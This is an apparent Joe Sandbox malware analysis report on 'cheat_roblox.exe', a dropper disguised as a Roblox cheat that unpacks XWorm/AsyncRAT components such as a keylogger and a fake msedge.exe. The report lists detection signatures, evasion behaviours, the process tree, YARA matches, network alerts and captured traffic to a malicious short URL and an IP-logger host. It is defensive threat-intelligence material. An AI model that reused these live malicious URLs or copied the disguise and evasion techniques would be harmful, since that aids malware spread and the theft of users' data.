Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cheat_roblox.exe

Overview

General Information

Sample name:cheat_roblox.exe
Analysis ID:1484385
MD5:d49b1a211ce49bed3e766471501819c6
SHA1:ed8f8b0d45ad556115c14a00247c080fa82d56e9
SHA256:1673b4f5f2d5ae3e3d2c5816534bf904ed1d2653b4a40bbb2a320231eca8259a
Tags:exe
Infos:

Detection

XWorm
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cheat_roblox.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\cheat_roblox.exe" MD5: D49B1A211CE49BED3E766471501819C6)
    • cmd.exe (PID: 7764 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7972 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 8092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 5364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,10681821834965854716,2612252034697891369,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • RobloxPlayerInstaller.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe" MD5: 27469372591B14FF1C57654FACB5E020)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x7df8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7e95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7faa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7aa6:$cnc4: POST / HTTP/1.1
    C:\Users\user\AppData\Local\Temp\ msedge.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\ msedge.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x7df8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x7e95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x7faa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x7aa6:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\Temp\Keyloger.exeJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x74d8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x7575:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x768a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x7186:$cnc4: POST / HTTP/1.1
          Process Memory Space: cheat_roblox.exe PID: 7640JoeSecurity_XWormYara detected XWormJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-30T00:49:18.443625+0200
            SID:2022930
            Source Port:443
            Destination Port:49732
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-30T00:49:42.483073+0200
            SID:2022930
            Source Port:443
            Destination Port:61123
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-30T00:49:41.144546+0200
            SID:2022930
            Source Port:443
            Destination Port:61122
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://2no.co/Avira URL Cloud: Label: malware
            Source: https://2no.co/redirect-2Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeAvira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeAvira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeAvira: detection malicious, Label: TR/Spy.Gen
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeReversingLabs: Detection: 81%
            Multi AV Scanner detection for submitted file
            Source: cheat_roblox.exeReversingLabs: Detection: 59%
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: cheat_roblox.exeJoe Sandbox ML: detected
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_8fc75716-f
            Source: unknownHTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49741 version: TLS 1.0
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeFile created: C:\Users\user\AppData\Local\Roblox\logs\RobloxPlayerInstaller_9F112.logJump to behavior
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.3.187.198:443 -> 192.168.2.9:61119 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.9:61121 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.9:61122 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.9:61123 version: TLS 1.2
            Source: cheat_roblox.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB1F6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.dr
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: cheat_roblox.exe
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.dr
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E3B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E3B190
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E240BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E240BC
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E4FCA0 FindFirstFileExA,0_2_00007FF6E7E4FCA0
            Source: global trafficTCP traffic: 192.168.2.9:60079 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.9:61118 -> 162.159.36.2:53
            Source: Joe Sandbox ViewIP Address: 99.86.4.125 99.86.4.125
            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
            Source: Joe Sandbox ViewIP Address: 88.212.202.52 88.212.202.52
            Source: Joe Sandbox ViewIP Address: 104.21.4.208 104.21.4.208
            Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: unknownHTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49741 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: global trafficHTTP traffic detected: GET /24RXx6 HTTP/1.1Host: 2no.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /redirect/handshake.png HTTP/1.1Host: cdn.iplogger.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 HTTP/1.1Host: counter.yadro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vWUpoG9ux8uKoBS&MD=+k9WfbGS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 HTTP/1.1Host: counter.yadro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FTID=1cg1nj32dger1cg1nj00367b
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdn.iplogger.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 HTTP/1.1Host: counter.yadro.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FTID=1cg1nj32dger1cg1nj00367b; VID=2DNPIG0nbdur1cg1nk003HAo
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdn.iplogger.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
            Source: global trafficHTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vWUpoG9ux8uKoBS&MD=+k9WfbGS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vWUpoG9ux8uKoBS&MD=+k9WfbGS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficDNS traffic detected: DNS query: ecsv2.roblox.com
            Source: global trafficDNS traffic detected: DNS query: clientsettingscdn.roblox.com
            Source: global trafficDNS traffic detected: DNS query: 2no.co
            Source: global trafficDNS traffic detected: DNS query: cdn.iplogger.org
            Source: global trafficDNS traffic detected: DNS query: counter.yadro.ru
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: client-telemetry.roblox.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: 26.165.165.52.in-addr.arpa
            Source: unknownHTTP traffic detected: POST /report/v4?s=%2BJTmNHgwHioPN1VPmZTocnt4x9yCwTmjK4IGhHrpCVWNf%2BX0QfcS27EEgMEfDt3n5oBkVrfy2gmymxlRNncb3eE%2BNabns2V2oWdUqt%2B6pchIIk0y0eYxI%2Bvmxvy3PDh%2B%2FlTe HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 423Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 29 Jul 2024 22:49:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://bit.ly/1eMQ42U
